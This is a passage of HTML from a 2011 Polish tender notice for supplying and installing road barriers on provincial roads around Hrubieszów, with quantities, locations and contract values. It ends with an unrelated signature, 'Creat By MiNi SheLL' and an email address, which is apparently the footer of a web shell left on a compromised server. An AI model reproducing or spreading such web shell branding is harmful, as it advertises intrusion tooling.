<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4:
1) Dostawa oraz montaż nowych, brakujących typowych elementów barier energochłonnych Sp - 04. Demontaż istniejących w terenie barier energochłonnych typu Sp - 04 oraz ich ponowny poprawny montaż wraz z  nowymi elementami.
Droga wojewódzka nr 850 w m. Zamłynie - mb 361. W tym wymiana 2 szt. prowadnic typu B, oraz 24 szt. tylnych pasów ochronnych.
Wartość zadania: 14 674,80 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5:
1) Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru.
W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 46 szt.
Przęsło ogrodzeniowe dł. 1,5 m - 2 szt.
Słupek mocujący dł. 3m - 52 szt.
Droga wojewódzka nr 846 w m. Wojsławice - mb 95.
2) Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego w Tyszowcach do dnia zgłoszenia zamówienia do odbioru. W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 102 szt.
Przęsło ogrodzeniowe dł. 1,5 m - 2 szt.
Słupek mocujący dł. 3m - 108 szt.
Droga wojewódzka nr 850 w m. Tyszowce - mb 207.
3) Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru. W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 8 szt.
Słupek mocujący dł. 3m - 9 szt.
Droga wojewódzka nr 844 w m. Mojsławice - mb 16.
Wartość zadania: 53 258,54 zł.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com